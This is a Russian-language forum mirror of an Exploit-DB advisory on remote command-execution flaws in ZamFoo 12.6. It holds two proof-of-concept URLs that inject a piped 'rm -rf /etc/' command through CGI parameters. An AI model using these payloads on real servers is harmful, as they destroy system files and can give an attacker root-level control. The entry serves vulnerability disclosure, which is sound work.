- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39156
- Проверка EDB
-
- Пройдено
- Автор
- AL-SHABAAB
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- N/A
- Дата публикации
- 2014-04-02
ZamFoo - Multiple Remote Command Execution Vulnerabilities
Код:
source: https://www.securityfocus.com/bid/67215/info
ZamFoo is prone to multiple remote command-execution vulnerabilities.
Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.
ZamFoo 12.6 is vulnerable; other versions may also be affected.
https://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS}
https://www.example.com/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf /etc/|&newip=127.0.0.1&pattern2=
- Источник
- www.exploit-db.com